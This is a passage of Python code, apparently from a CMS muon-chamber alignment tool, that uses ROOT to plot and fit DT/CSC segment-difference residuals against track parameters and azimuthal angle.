label2 = ROOT.TPaveLabel(0, 0, 1, 1, "dx/dz residuals (mrad)")
label3 = ROOT.TPaveLabel(0, 0.3, 1, 1, "x position (cm)")
label4 = ROOT.TPaveLabel(0, 0.3, 1, 1, "y position (cm)")
label5 = ROOT.TPaveLabel(0, 0.3, 1, 1, "dx/dz angle (rad)")
label6 = ROOT.TPaveLabel(0, 0.3, 1, 1, "dy/dz angle (rad)")
label9 = ROOT.TPaveLabel(0, 0.85, 1, 1, getname(r),"NDC")
if name[0:2] == "ME":
label1 = ROOT.TPaveLabel(0, 0, 1, 1, "r#phi residuals (mm)")
label2 = ROOT.TPaveLabel(0, 0, 1, 1, "d(r#phi)/dz residuals (mrad)")
for l in label1, label2, label3, label4, label5, label6, label9:
l.SetBorderSize(0)
l.SetFillColor(ROOT.kWhite)
for l in label1, label2:
l.SetTextAngle(90)
l.SetTextSize(0.09)
#label9.SetTextAngle(30)
label9.SetTextSize(0.29)
pads[1].cd(); label1.Draw()
pads[6].cd(); label2.Draw()
pads[12].cd(); label3.Draw()
pads[13].cd(); label4.Draw()
pads[14].cd(); label5.Draw()
pads[15].cd(); label6.Draw()
#pads[11].cd(); label9.Draw()
pads[2].SetRightMargin(1e-5)
pads[2].SetBottomMargin(1e-5)
pads[3].SetLeftMargin(1e-5)
pads[3].SetRightMargin(1e-5)
pads[3].SetBottomMargin(1e-5)
pads[4].SetLeftMargin(1e-5)
pads[4].SetRightMargin(1e-5)
pads[4].SetBottomMargin(1e-5)
pads[5].SetLeftMargin(1e-5)
pads[5].SetBottomMargin(1e-5)
pads[7].SetRightMargin(1e-5)
pads[7].SetTopMargin(1e-5)
pads[8].SetLeftMargin(1e-5)
pads[8].SetRightMargin(1e-5)
pads[8].SetTopMargin(1e-5)
pads[9].SetLeftMargin(1e-5)
pads[9].SetRightMargin(1e-5)
pads[9].SetTopMargin(1e-5)
pads[10].SetLeftMargin(1e-5)
pads[10].SetTopMargin(1e-5)
chamber_x_trackx.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_x_tracky.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_x_tracky.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_x_trackdxdz.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_x_trackdxdz.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_x_trackdydz.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_x_trackdydz.GetYaxis().SetLabelColor(ROOT.kWhite)
# chamber_dxdz_trackx
chamber_dxdz_tracky.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_dxdz_trackdxdz.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_dxdz_trackdydz.GetYaxis().SetLabelColor(ROOT.kWhite)
pads[2].cd()
chamber_x_trackx.Draw("e1")
if not suppressblue: chamber_x_trackx_fit2.Draw("samel")
chamber_x_trackx_fit.Draw("samel")
label9.Draw()
pads[3].cd()
chamber_x_tracky.Draw("e1")
if not suppressblue: chamber_x_tracky_fit2.Draw("samel")
chamber_x_tracky_fit.Draw("samel")
pads[4].cd()
chamber_x_trackdxdz.Draw("e1")
if not suppressblue: chamber_x_trackdxdz_fit2.Draw("samel")
chamber_x_trackdxdz_fit.Draw("samel")
pads[5].cd()
chamber_x_trackdydz.Draw("e1")
if not suppressblue: chamber_x_trackdydz_fit2.Draw("samel")
chamber_x_trackdydz_fit.Draw("samel")
pads[7].cd()
chamber_dxdz_trackx.Draw("e1")
if not suppressblue: chamber_dxdz_trackx_fit2.Draw("samel")
chamber_dxdz_trackx_fit.Draw("samel")
pads[8].cd()
chamber_dxdz_tracky.Draw("e1")
if not suppressblue: chamber_dxdz_tracky_fit2.Draw("samel")
chamber_dxdz_tracky_fit.Draw("samel")
pads[9].cd()
chamber_dxdz_trackdxdz.Draw("e1")
if not suppressblue: chamber_dxdz_trackdxdz_fit2.Draw("samel")
chamber_dxdz_trackdxdz_fit.Draw("samel")
pads[10].cd()
chamber_dxdz_trackdydz.Draw("e1")
if not suppressblue: chamber_dxdz_trackdydz_fit2.Draw("samel")
chamber_dxdz_trackdydz_fit.Draw("samel")
tn = time.time()
ddt[8] = 1./ddt[7]*((ddt[7]-1)*ddt[8] + tn-t1)
##################################################################################
def segdiff(tfiles, component, pair, **args):
tdrStyle.SetOptFit(1)
tdrStyle.SetOptTitle(1)
tdrStyle.SetTitleBorderSize(1)
tdrStyle.SetTitleFontSize(0.05)
tdrStyle.SetStatW(0.2)
tdrStyle.SetStatY(0.9)
tdrStyle.SetStatFontSize(0.06)
if component[0:2] == "dt":
wheel = args["wheel"]
wheelletter = wheelLetter(wheel)
sector = args["sector"]
profname = "%s_%s_%02d_%s" % (component, wheelletter, sector, str(pair))
posname = "pos" + profname
negname = "neg" + profname
#print profname
station1 = int(str(pair)[0])
station2 = int(str(pair)[1])
phi1 = signConventions["DT", wheel, station1, sector][4]
phi2 = signConventions["DT", wheel, station2, sector][4]
if abs(phi1 - phi2) > 1.:
if phi1 > phi2: phi1 -= 2.*pi
else: phi1 += 2.*pi
phi = (phi1 + phi2) / 2.
while (phi < -pi): phi += 2.*pi
while (phi > pi): phi -= 2.*pi
elif component[0:3] == "csc":
endcap = args["endcap"]
if endcap=="m":
endcapnum=2
endcapsign="-"
elif endcap=="p":
endcapnum=1
endcapsign="+"
else: raise Exception
ring = args["ring"]
if ring>2 or ring<1: raise Exception
station1 = int(str(pair)[0])
station2 = int(str(pair)[1])
if ring==1: ringname="inner"
elif ring==2: ringname="outer"
else: raise Exception
chamber = args["chamber"]
if (ring==1 and chamber>18) or (ring==2 and chamber>36): raise Exception
profname = "csc%s_%s_%s_%02d_%s" % (ringname,component[4:], endcap, chamber, str(pair))
posname = "pos" + profname
negname = "neg" + profname
#print profname
station1 = int(str(pair)[0])
station2 = int(str(pair)[1])
phi1 = signConventions["CSC", endcapnum, station1, ring, chamber][4]
phi2 = signConventions["CSC", endcapnum, station2, ring, chamber][4]
if abs(phi1 - phi2) > 1.:
if phi1 > phi2: phi1 -= 2.*pi
else: phi1 += 2.*pi
phi = (phi1 + phi2) / 2.
while (phi < -pi*5./180.): phi += 2.*pi
while (phi > pi*(2.-5./180.)): phi -= 2.*pi
else: raise Exception
if "window" in args: window = args["window"]
else: window = 5.
global tmpprof, tmppos, tmpneg
pdir = "AlignmentMonitorSegmentDifferences/iter1/"
tmpprof = tfiles[0].Get(pdir + profname).Clone()
tmpprof.SetMarkerStyle(8)
tmppos = tfiles[0].Get(pdir + posname).Clone()
tmpneg = tfiles[0].Get(pdir + negname).Clone()
for tfile in tfiles[1:]:
tmpprof.Add(tfile.Get(pdir + profname))
tmppos.Add(tfile.Get(pdir + posname))
tmpneg.Add(tfile.Get(pdir + negname))
for i in xrange(1, tmpprof.GetNbinsX()+1):
if tmpprof.GetBinError(i) < 1e-5:
tmpprof.SetBinError(i, 100.)
tmpprof.SetAxisRange(-window, window, "Y")
f = ROOT.TF1("p1", "[0] + [1]*x", tmpprof.GetBinLowEdge(1), -tmpprof.GetBinLowEdge(1))
f.SetParameters((tmppos.GetMean() + tmpneg.GetMean())/2., 0.)
tmpprof.SetXTitle("q/p_{T} (c/GeV)")
if component == "dt13_resid":
tmpprof.SetYTitle("#Deltax^{local} (mm)")
tmppos.SetXTitle("#Deltax^{local} (mm)")
tmpneg.SetXTitle("#Deltax^{local} (mm)")
f.SetParNames("#Deltax^{local}_{0}", "Slope")
if component == "dt13_slope":
tmpprof.SetYTitle("#Deltadx/dz^{local} (mrad)")
tmppos.SetXTitle("#Deltadx/dz^{local} (mrad)")
tmpneg.SetXTitle("#Deltadx/dz^{local} (mrad)")
f.SetParNames("#Deltadx/dz^{local}_{0}", "Slope")
if component == "dt2_resid":
tmpprof.SetYTitle("#Deltay^{local} (mm)")
tmppos.SetXTitle("#Deltay^{local} (mm)")
tmpneg.SetXTitle("#Deltay^{local} (mm)")
f.SetParNames("#Deltay^{local}_{0}", "Slope")
if component == "dt2_slope":
tmpprof.SetYTitle("#Deltady/dz^{local} (mrad)")
tmppos.SetXTitle("#Deltady/dz^{local} (mrad)")
tmpneg.SetXTitle("#Deltady/dz^{local} (mrad)")
f.SetParNames("#Deltady/dz^{local}_{0}", "Slope")
if component == "csc_resid":
tmpprof.SetXTitle("q/p_{z} (c/GeV)")
tmpprof.SetYTitle("#Delta(r#phi)^{local} (mm)")
tmppos.SetXTitle("#Delta(r#phi)^{local} (mm)")
tmpneg.SetXTitle("#Delta(r#phi)^{local} (mm)")
f.SetParNames("#Delta(r#phi)^{local}_{0}", "Slope")
if component == "csc_slope":
tmpprof.SetXTitle("q/p_{z} (c/GeV)")
tmpprof.SetYTitle("#Deltad(r#phi)/dz^{local} (mrad)")
tmppos.SetXTitle("#Deltad(r#phi)/dz^{local} (mrad)")
tmpneg.SetXTitle("#Deltad(r#phi)/dz^{local} (mrad)")
f.SetParNames("#Deltad(r#phi)/dz^{local}_{0}", "Slope")
tmpprof.GetXaxis().CenterTitle()
tmpprof.GetYaxis().CenterTitle()
tmppos.GetXaxis().CenterTitle()
tmpneg.GetXaxis().CenterTitle()
if component[0:2] == "dt":
tmpprof.SetTitle("MB%d - MB%d, wheel %d, sector %02d" % (station1, station2, int(wheel), int(sector)))
elif component[0:3] == "csc":
tmpprof.SetTitle("ME%d - ME%d, for ME%s%d/%d/%d" % (station1, station2, endcapsign, station2, ring, chamber))
else: raise Exception
tmppos.SetTitle("Positive muons")
tmpneg.SetTitle("Negative muons")
c1.Clear()
c1.Divide(2, 1)
c1.GetPad(1).cd()
fit1 = tmpprof.Fit("p1", "qS")
tmpprof.Draw("e1")
c1.GetPad(2).cd()
c1.GetPad(2).Divide(1, 2)
c1.GetPad(2).GetPad(1).cd()
tmppos.Draw()
f = ROOT.TF1("gausR", "[0]*exp(-(x - [1])**2 / 2. / [2]**2) / sqrt(2.*3.1415926) / [2]",
tmppos.GetMean() - tmppos.GetRMS(), tmppos.GetMean() + tmppos.GetRMS())
f.SetParameters(tmppos.GetEntries() * ((10. - -10.)/100.), tmppos.GetMean(), tmppos.GetRMS())
f.SetParNames("Constant", "Mean", "Sigma")
fit2 = tmppos.Fit("gausR", "qRS")
c1.GetPad(2).GetPad(2).cd()
tmpneg.Draw()
f = ROOT.TF1("gausR", "[0]*exp(-(x - [1])**2 / 2. / [2]**2) / sqrt(2.*3.1415926) / [2]",
tmpneg.GetMean() - tmpneg.GetRMS(), tmpneg.GetMean() + tmpneg.GetRMS())
f.SetParameters(tmpneg.GetEntries() * ((10. - -10.)/100.), tmpneg.GetMean(), tmpneg.GetRMS())
f.SetParNames("Constant", "Mean", "Sigma")
fit3 = tmpneg.Fit("gausR", "qRS")
fit1ok = fit1.Status()==0 and fit1.CovMatrixStatus()==3
fit2ok = fit2.Status()==0 and fit2.CovMatrixStatus()==3
fit3ok = fit3.Status()==0 and fit3.CovMatrixStatus()==3
fitresult1 = None, None
if fit1ok:
fitresult1 = tmpprof.GetFunction("p1").GetParameter(0), tmpprof.GetFunction("p1").GetParError(0)
fitresult2 = None, None
if fit2ok and fit3ok:
fitresult2 = (tmppos.GetFunction("gausR").GetParameter(1) + tmpneg.GetFunction("gausR").GetParameter(1)) / 2., \
sqrt(tmppos.GetFunction("gausR").GetParError(1)**2 + tmpneg.GetFunction("gausR").GetParError(1)**2) / 2.
return phi, fitresult1[0], fitresult1[1], fitresult2[0], fitresult2[1], fit1ok, fit2ok, fit3ok
##################################################################################
def segdiff_xalign(tfiles, component, **args):
tdrStyle.SetOptFit(1)
tdrStyle.SetOptTitle(1)
tdrStyle.SetTitleBorderSize(1)
tdrStyle.SetTitleFontSize(0.05)
tdrStyle.SetStatW(0.2)
tdrStyle.SetStatY(0.9)
tdrStyle.SetStatFontSize(0.06)
if component[0:4] == "x_dt":
wheel = int(args["wheel"])
if int(wheel)<0:
wheell = "m%d" % abs(wheel)
endcapsign="-"
else:
wheell = "p%d" % abs(wheel)
endcapsign="+"
station_dt = component[4]
station_csc_1 = args["cscstations"][0]
if station_csc_1=='1': ring_1 = 3
else: ring_1 = 2
sector = args["sector"]
profname = "%s%s_W%sS%02d" % (component, station_csc_1, wheell, sector)
posname_1 = "pos_" + profname
negname_1 = "neg_" + profname
if len(args["cscstations"]) > 1:
station_csc_2 = args["cscstations"][1]
if station_csc_2=='1': ring_2 = 3
else: ring_2 = 2
profname = "%s%s_W%sS%02d" % (component, station_csc_2, wheell, sector)
posname_2 = "pos_" + profname
negname_2 = "neg_" + profname
phi = signConventions["DT", wheel, int(station_dt), sector][4]
while (phi < -pi): phi += 2.*pi
while (phi > pi): phi -= 2.*pi
else: raise Exception
if "window" in args: window = args["window"]
else: window = 5.
global tmppos, tmpneg, tmppos_2, tmpneg_2
pdir = "AlignmentMonitorSegmentDifferences/iter1/"
tmppos = tfiles[0].Get(pdir + posname_1).Clone()
tmpneg = tfiles[0].Get(pdir + negname_1).Clone()
if len(args["cscstations"]) > 1:
tmppos_2 = tfiles[0].Get(pdir + posname_2).Clone()
tmpneg_2 = tfiles[0].Get(pdir + negname_2).Clone()
tmpneg.Rebin(2); tmppos.Rebin(2)
for tfile in tfiles[1:]:
tmppos.Add(tfile.Get(pdir + posname_1))
tmpneg.Add(tfile.Get(pdir + negname_1))
if len(args["cscstations"]) > 1:
tmppos_2.Add(tfile.Get(pdir + posname_2))
tmpneg_2.Add(tfile.Get(pdir + negname_2))
tmpneg_2.Rebin(2); tmppos_2.Rebin(2)
result = {}
result["fit_ok"] = False
result["phi"] = phi
ntot = tmppos.GetEntries() + tmpneg.GetEntries()
if ntot == 0:
return result
tmppos.SetXTitle("#Deltax^{loc}_{MB} - r_{DT}/r_{CSC}#times#Deltax^{loc}_{ME} (mm)")
tmpneg.SetXTitle("#Deltax^{loc}_{MB} - r_{DT}/r_{CSC}#times#Deltax^{loc}_{ME} (mm)")
title1 = "MB(W%+d St%s Sec%d) - ME%s%s/%d" % (wheel, station_dt, int(sector), endcapsign, station_csc_1, ring_1)
tmppos.SetTitle("Positive #mu: %s" % title1);
tmpneg.SetTitle("Negative #mu: %s" % title1);
tmppos.GetXaxis().CenterTitle()
tmpneg.GetXaxis().CenterTitle()
if len(args["cscstations"]) > 1:
tmppos.SetXTitle("#Deltax^{loc}_{DT} - r_{DT}/r_{CSC}#times#Deltax^{loc}_{CSC} (mm)")
tmpneg.SetXTitle("#Deltax^{loc}_{DT} - r_{DT}/r_{CSC}#times#Deltax^{loc}_{CSC} (mm)")
title2 = "MB(W%+d St%s Sec%d) - ME%s%s/%d" % (wheel, station_dt, int(sector), endcapsign, station_csc_2, ring_2)
tmppos_2.SetTitle("Positive #mu: %s" % title2);
tmpneg_2.SetTitle("Negative #mu: %s" % title2);
tmppos_2.GetXaxis().CenterTitle()
tmpneg_2.GetXaxis().CenterTitle()
c1.Clear()
c1.Divide(2, 2)
c1.GetPad(1).cd()
tmppos.Draw()
fpos = ROOT.TF1("gpos", "gaus", tmppos.GetMean() - tmppos.GetRMS(), tmppos.GetMean() + tmppos.GetRMS())
fpos.SetParameters(tmppos.GetEntries() * 2.5, tmppos.GetMean(), tmppos.GetRMS())
fit_pos = tmppos.Fit("gpos", "qRS")
c1.GetPad(3).cd()
tmpneg.Draw()
fneg = ROOT.TF1("gneg", "gaus", tmpneg.GetMean() - tmpneg.GetRMS(), tmpneg.GetMean() + tmpneg.GetRMS())
fneg.SetParameters(tmpneg.GetEntries() * 2.5, tmpneg.GetMean(), tmpneg.GetRMS())
fit_neg = tmpneg.Fit("gneg", "qRS")
result["fit_ok"] = (fit_pos.Status()==0 and fit_pos.CovMatrixStatus()==3 and fit_neg.Status()==0 and fit_neg.CovMatrixStatus()==3)
result["fit_peak"] = (fpos.GetParameter(1)*tmppos.GetEntries() + fneg.GetParameter(1)*tmpneg.GetEntries()) / ntot
result["fit_peak_error"] = sqrt( (fpos.GetParError(1)*tmppos.GetEntries())**2 + (fneg.GetParError(1)*tmpneg.GetEntries())**2) / ntot
if len(args["cscstations"]) > 1:
c1.GetPad(2).cd()
tmppos_2.Draw()
fpos_2 = ROOT.TF1("gpos2", "gaus", tmppos_2.GetMean() - tmppos_2.GetRMS(), tmppos_2.GetMean() + tmppos_2.GetRMS())
fpos_2.SetParameters(tmppos_2.GetEntries() * 2.5, tmppos_2.GetMean(), tmppos_2.GetRMS())
fit_pos_2 = tmppos_2.Fit("gpos2", "qRS")
c1.GetPad(4).cd()
tmpneg_2.Draw()
fneg_2 = ROOT.TF1("gneg2", "gaus", tmpneg_2.GetMean() - tmpneg_2.GetRMS(), tmpneg_2.GetMean() + tmpneg_2.GetRMS())
fneg_2.SetParameters(tmpneg_2.GetEntries() * 2.5, tmpneg_2.GetMean(), tmpneg_2.GetRMS())
fit_neg_2 = tmpneg_2.Fit("gneg2", "qRS")
result["fit_ok_2"] = (fit_pos_2.Status()==0 and fit_pos_2.CovMatrixStatus()==3 and fit_neg_2.Status()==0 and fit_neg_2.CovMatrixStatus()==3)
ntot = tmppos_2.GetEntries() + tmpneg_2.GetEntries()
result["fit_peak_2"] = (fpos_2.GetParameter(1)*tmppos_2.GetEntries() + fneg_2.GetParameter(1)*tmpneg_2.GetEntries()) / ntot
result["fit_peak_error_2"] = sqrt( (fpos_2.GetParError(1)*tmppos_2.GetEntries())**2 + (fneg_2.GetParError(1)*tmpneg_2.GetEntries())**2) / ntot
return result
##################################################################################
def segdiffvsphi_xalign(tfiles, wheel, window=10.):
tdrStyle.SetOptTitle(1)
tdrStyle.SetTitleBorderSize(1)
tdrStyle.SetTitleFontSize(0.05)
global htemp, gtemp_12, gtemp_21, gtemp_11, tlegend
htemp = ROOT.TH1F("htemp", "", 1, -pi, pi)
gtemp_11_phi, gtemp_11_val, gtemp_11_err = [], [], []
gtemp_12_phi, gtemp_12_val, gtemp_12_err = [], [], []
gtemp_21_phi, gtemp_21_val, gtemp_21_err = [], [], []
for sector in xrange(1, 12+1):
#print "sect", sector
r1 = segdiff_xalign(tfiles, "x_dt1_csc", wheel=wheel, sector=sector, cscstations = "12")
r2 = segdiff_xalign(tfiles, "x_dt2_csc", wheel=wheel, sector=sector, cscstations = "1")
if r1["fit_ok"]:
gtemp_11_phi.append(r1["phi"])
gtemp_11_val.append(r1["fit_peak"])
gtemp_11_err.append(r1["fit_peak_error"])
if r1["fit_ok_2"]:
gtemp_12_phi.append(r1["phi"])
gtemp_12_val.append(r1["fit_peak_2"])
gtemp_12_err.append(r1["fit_peak_error_2"])
if r2["fit_ok"]:
gtemp_21_phi.append(r2["phi"])
gtemp_21_val.append(r2["fit_peak"])
gtemp_21_err.append(r2["fit_peak_error"])
#print "len(gtemp_11_phi) ",len(gtemp_11_phi)
#print "len(gtemp_12_phi) ",len(gtemp_12_phi)
#print "len(gtemp_21_phi) ",len(gtemp_21_phi)
if len(gtemp_11_phi) > 0:
gtemp_11 = ROOT.TGraphErrors(len(gtemp_11_phi), array.array("d", gtemp_11_phi), array.array("d", gtemp_11_val),
array.array("d", [0.] * len(gtemp_11_phi)), array.array("d", gtemp_11_err))
if len(gtemp_12_phi) > 0:
gtemp_12 = ROOT.TGraphErrors(len(gtemp_12_phi), array.array("d", gtemp_12_phi), array.array("d", gtemp_12_val),
array.array("d", [0.] * len(gtemp_12_phi)), array.array("d", gtemp_12_err))
if len(gtemp_11_phi) > 0:
gtemp_21 = ROOT.TGraphErrors(len(gtemp_21_phi), array.array("d", gtemp_21_phi), array.array("d", gtemp_21_val),
array.array("d", [0.] * len(gtemp_21_phi)), array.array("d", gtemp_21_err))
if len(gtemp_11_phi) > 0:
gtemp_11.SetMarkerStyle(20); gtemp_11.SetMarkerSize(1.5);
gtemp_11.SetMarkerColor(ROOT.kRed); gtemp_11.SetLineColor(ROOT.kRed)
if len(gtemp_12_phi) > 0:
gtemp_12.SetMarkerStyle(22); gtemp_12.SetMarkerSize(1.);
gtemp_12.SetMarkerColor(ROOT.kGreen+2); gtemp_12.SetLineColor(ROOT.kGreen+2)
if len(gtemp_21_phi) > 0:
gtemp_21.SetMarkerStyle(21); gtemp_21.SetMarkerSize(1.5);
gtemp_21.SetMarkerColor(ROOT.kBlue); gtemp_21.SetLineColor(ROOT.kBlue)
htemp.SetTitle("Wheel %+d" % wheel)
htemp.SetAxisRange(-window, window, "Y")
htemp.SetXTitle("#phi of MB")
htemp.SetYTitle("#Deltax^{loc}_{DT} - r_{DT}/r_{CSC}#times#Deltax^{loc}_{CSC} (mm)")
htemp.GetXaxis().CenterTitle()
htemp.GetYaxis().CenterTitle()
htemp.GetYaxis().SetTitleOffset(0.75)
c1.Clear()
htemp.Draw()
if len(gtemp_12_phi) > 0:
gtemp_12.Draw("p")
if len(gtemp_21_phi) > 0:
gtemp_21.Draw("p")
if len(gtemp_11_phi) > 0:
gtemp_11.Draw("p")
tlegend = ROOT.TLegend(0.59, 0.75, 0.99, 0.92)
tlegend.SetBorderSize(0)
tlegend.SetFillColor(ROOT.kWhite)
if len(gtemp_11_phi) > 0:
tlegend.AddEntry(gtemp_11, "MB1 - ME1/3 (mean: %4.2f, RMS: %4.2f)" % (mean(gtemp_11_val), stdev(gtemp_11_val)), "pl")
if len(gtemp_21_phi) > 0:
tlegend.AddEntry(gtemp_21, "MB2 - ME1/3 (mean: %4.2f, RMS: %4.2f)" % (mean(gtemp_21_val), stdev(gtemp_21_val)), "pl")
if len(gtemp_12_phi) > 0:
tlegend.AddEntry(gtemp_12, "MB1 - ME2/2 (mean: %4.2f, RMS: %4.2f)" % (mean(gtemp_12_val), stdev(gtemp_12_val)), "pl")
#if len(gtemp_12_phi) > 0:
# tlegend.AddEntry(gtemp_12, "total mean: %4.2f, total RMS: %4.2f" % \
# (mean(gtemp_11_val + gtemp_12_val + gtemp_21_val),
# stdev(gtemp_11_val + gtemp_12_val + gtemp_21_val)), "")
tlegend.Draw()
f_11 = ROOT.TF1("f11", "[0] + [1]*sin(x) + [2]*cos(x)", -pi, pi)
f_11.SetLineColor(ROOT.kRed)
f_11.SetLineWidth(2)
f_21 = ROOT.TF1("f21", "[0] + [1]*sin(x) + [2]*cos(x)", -pi, pi)
f_21.SetLineColor(ROOT.kBlue)
f_21.SetLineWidth(2)
if len(gtemp_11_phi) > 0:
gtemp_11.Fit(f_11,"")
if len(gtemp_21_phi) > 0:
gtemp_21.Fit(f_21,"")
global f_txt,f_11_txt, f_21_txt
f_txt = ROOT.TLatex(-2.9, -0.7*window, "ME1/3 ring corrections equivalents:")
f_txt.SetTextSize(0.028)
f_txt.Draw()
if len(gtemp_11_phi) > 0:
rdt = signConventions[("DT", 2, 1, 1)][3]*10
f_11_txt = ROOT.TLatex(-2.9, -0.8*window, "#Deltax=%.2f#pm%.2f mm #Deltay=%.2f#pm%.2f mm #Delta#phi_{z}=%.2f#pm%.2f mrad" % (
-f_11.GetParameter(1), f_11.GetParError(1), f_11.GetParameter(2), f_11.GetParError(2), -f_11.GetParameter(0)/rdt*1000, f_11.GetParError(0)/rdt*1000))
f_11_txt.SetTextSize(0.028)
f_11_txt.SetTextColor(ROOT.kRed)
f_11_txt.Draw()
if len(gtemp_11_phi) > 0:
rdt = signConventions[("DT", 2, 2, 1)][3]*10
f_21_txt = ROOT.TLatex(-2.9, -0.9*window, "#Deltax=%.2f#pm%.2f mm #Deltay=%.2f#pm%.2f mm #Delta#phi_{z}=%.2f#pm%.2f mrad" % (
-f_21.GetParameter(1), f_21.GetParError(1), f_21.GetParameter(2), f_21.GetParError(2), -f_21.GetParameter(0)/rdt*1000, f_21.GetParError(0)/rdt*1000))
f_21_txt.SetTextSize(0.028)
f_21_txt.SetTextColor(ROOT.kBlue)
f_21_txt.Draw()
##################################################################################
def segdiffvsphi(tfiles, reports, component, wheel, window=5., excludesectors=()):
tdrStyle.SetOptTitle(1)
tdrStyle.SetTitleBorderSize(1)
tdrStyle.SetTitleFontSize(0.05)
global htemp, gtemp_12, gtemp2_12, gtemp_23, gtemp2_23, gtemp_34, gtemp2_34, tlegend
htemp = ROOT.TH1F("htemp", "", 1, -pi, pi)
gtemp_12_phi, gtemp_12_val, gtemp_12_err, gtemp_12_val2, gtemp_12_err2 = [], [], [], [], []
gtemp_23_phi, gtemp_23_val, gtemp_23_err, gtemp_23_val2, gtemp_23_err2 = [], [], [], [], []
gtemp_34_phi, gtemp_34_val, gtemp_34_err, gtemp_34_val2, gtemp_34_err2 = [], [], [], [], []
for sector in xrange(1, 12+1):
#print "sect", sector
r1_found, r2_found, r3_found, r4_found = False, False, False, False
for r1 in reports:
if r1.postal_address == ("DT", wheel, 1, sector):
r1_found = True
break
for r2 in reports:
if r2.postal_address == ("DT", wheel, 2, sector):
r2_found = True
break
for r3 in reports:
if r3.postal_address == ("DT", wheel, 3, sector):
r3_found = True
break
for r4 in reports:
if r4.postal_address == ("DT", wheel, 4, sector):
r4_found = True
break
#print "rfounds: ", r1_found, r2_found, r3_found, r4_found
if sector not in excludesectors:
if r1_found and r2_found and r1.status == "PASS" and r2.status == "PASS":
phi, val, err, val2, err2, fit1, fit2, fit3 = segdiff(tfiles, component, 12, wheel=wheel, sector=sector)
#print "segdif 12", phi, val, err, val2, err2, fit1, fit2, fit3
if fit1 and fit2 and fit3:
gtemp_12_phi.append(phi)
gtemp_12_val.append(val)
gtemp_12_err.append(err)
gtemp_12_val2.append(val2)
gtemp_12_err2.append(err2)
if r2_found and r3_found and r2.status == "PASS" and r3.status == "PASS":
phi, val, err, val2, err2, fit1, fit2, fit3 = segdiff(tfiles, component, 23, wheel=wheel, sector=sector)
#print "segdif 23", phi, val, err, val2, err2, fit1, fit2, fit3
if fit1 and fit2 and fit3:
gtemp_23_phi.append(phi)
gtemp_23_val.append(val)
gtemp_23_err.append(err)
gtemp_23_val2.append(val2)
gtemp_23_err2.append(err2)
if component[:4] == "dt13":
if r3_found and r4_found and r3.status == "PASS" and r4.status == "PASS":
phi, val, err, val2, err2, fit1, fit2, fit3 = segdiff(tfiles, component, 34, wheel=wheel, sector=sector)
#print "segdif 34", phi, val, err, val2, err2, fit1, fit2, fit3
if fit1 and fit2 and fit3:
gtemp_34_phi.append(phi)
gtemp_34_val.append(val)
gtemp_34_err.append(err)
gtemp_34_val2.append(val2)
gtemp_34_err2.append(err2)
#print "len(gtemp_12_phi) ", len(gtemp_12_phi)
#print "len(gtemp_23_phi) ",len(gtemp_23_phi)
#print "len(gtemp_34_phi) ",len(gtemp_34_phi)
if len(gtemp_12_phi) > 0:
gtemp_12 = ROOT.TGraphErrors(len(gtemp_12_phi), array.array("d", gtemp_12_phi), array.array("d", gtemp_12_val),
array.array("d", [0.] * len(gtemp_12_phi)), array.array("d", gtemp_12_err))
gtemp2_12 = ROOT.TGraphErrors(len(gtemp_12_phi), array.array("d", gtemp_12_phi), array.array("d", gtemp_12_val2),
array.array("d", [0.] * len(gtemp_12_phi)), array.array("d", gtemp_12_err2))
if len(gtemp_23_phi) > 0:
gtemp_23 = ROOT.TGraphErrors(len(gtemp_23_phi), array.array("d", gtemp_23_phi), array.array("d", gtemp_23_val),
array.array("d", [0.] * len(gtemp_23_phi)), array.array("d", gtemp_23_err))
gtemp2_23 = ROOT.TGraphErrors(len(gtemp_23_phi), array.array("d", gtemp_23_phi), array.array("d", gtemp_23_val2),
array.array("d", [0.] * len(gtemp_23_phi)), array.array("d", gtemp_23_err2))
if len(gtemp_34_phi) > 0:
gtemp_34 = ROOT.TGraphErrors(len(gtemp_34_phi), array.array("d", gtemp_34_phi), array.array("d", gtemp_34_val),
array.array("d", [0.] * len(gtemp_34_phi)), array.array("d", gtemp_34_err))
gtemp2_34 = ROOT.TGraphErrors(len(gtemp_34_phi), array.array("d", gtemp_34_phi), array.array("d", gtemp_34_val2),
array.array("d", [0.] * len(gtemp_34_phi)), array.array("d", gtemp_34_err2))
if len(gtemp_12_phi) > 0:
gtemp_12.SetMarkerStyle(20); gtemp_12.SetMarkerSize(1.);
gtemp_12.SetMarkerColor(ROOT.kBlue); gtemp_12.SetLineColor(ROOT.kBlue)
gtemp2_12.SetMarkerStyle(24); gtemp2_12.SetMarkerSize(1.);
gtemp2_12.SetMarkerColor(ROOT.kBlue); gtemp2_12.SetLineColor(ROOT.kBlue)
if len(gtemp_23_phi) > 0:
gtemp_23.SetMarkerStyle(21); gtemp_23.SetMarkerSize(1.);
gtemp_23.SetMarkerColor(ROOT.kRed); gtemp_23.SetLineColor(ROOT.kRed)
gtemp2_23.SetMarkerStyle(25); gtemp2_23.SetMarkerSize(1.);
gtemp2_23.SetMarkerColor(ROOT.kRed); gtemp2_23.SetLineColor(ROOT.kRed)
if len(gtemp_34_phi) > 0 and component[:4] == "dt13":
gtemp_34.SetMarkerStyle(22); gtemp_34.SetMarkerSize(1.25);
gtemp_34.SetMarkerColor(ROOT.kGreen+2); gtemp_34.SetLineColor(ROOT.kGreen+2)
gtemp2_34.SetMarkerStyle(26); gtemp2_34.SetMarkerSize(1.25);
gtemp2_34.SetMarkerColor(ROOT.kGreen+2); gtemp2_34.SetLineColor(ROOT.kGreen+2)
if wheel == 0: htemp.SetTitle("Wheel %d" % wheel)
else: htemp.SetTitle("Wheel %+d" % wheel)
htemp.SetAxisRange(-window, window, "Y")
htemp.SetXTitle("Average #phi of pair (rad)")
if component == "dt13_resid": htemp.SetYTitle("#Deltax^{local} (mm)")
if component == "dt13_slope": htemp.SetYTitle("#Deltadx/dz^{local} (mrad)")
if component == "dt2_resid": htemp.SetYTitle("#Deltay^{local} (mm)")
if component == "dt2_slope": htemp.SetYTitle("#Deltady/dz^{local} (mrad)")
htemp.GetXaxis().CenterTitle()
htemp.GetYaxis().CenterTitle()
htemp.GetYaxis().SetTitleOffset(0.75)
c1.Clear()
htemp.Draw()
if len(gtemp_12_phi) > 0:
gtemp_12.Draw("p")
gtemp2_12.Draw("p")
